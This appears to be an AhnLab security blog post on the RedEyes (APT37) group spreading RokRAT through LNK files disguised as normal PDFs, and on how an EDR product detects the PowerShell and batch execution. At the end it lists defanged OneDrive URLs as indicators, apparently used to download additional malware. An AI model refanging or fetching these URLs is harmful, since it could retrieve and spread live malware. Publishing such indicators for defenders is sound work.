AhnLab Security Emergency response Center (ASEC) has shared information regarding the RedEyes threat group (also known as APT37, ScarCruft), who distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month.
The LNK file contains a PowerShell command and performs malicious behavior without the knowledge of the individual who uses the normal pdf file by creating and executing script files along with normal files in the temp path.
If a malicious LNK file is injected into a user’s system and executed, then AhnLab EDR detects the suspicious execution of a PowerShell command in the following way:
Clicking on cmd.exe in the figure shown above displays the execution history of the .bat file and the command it contains, as shown below.
If the suspicious execution of a Porshell.exe command via a batch (.bat) file is detected, the user can identify the system and individual that logged in to execute the command by checking the host information on the top right corner.
As shown in the figure below, it is possible to confirm the download URL used to install additional malware if the PC in question is investigated further.
If suspicious logs are confirmed, managers can respond through EDR’s features that allow them to terminate processes and quarantine the network of the system in question.
RokRAT has been continuously distributed since the past, and as shown in the case above, it also executes a normal file, making it difficult for users to detect the infection. EDR products that are also capable of detecting and responding to suspicious behavior are required to handle malware as they continue to evolve.
hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQzZ5/root/content hxxps://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content
More details about AhnLab EDR which actively tracks threats and provides endpoint visibility through behavior-based detection and analysis can be found here on the AhnLab page.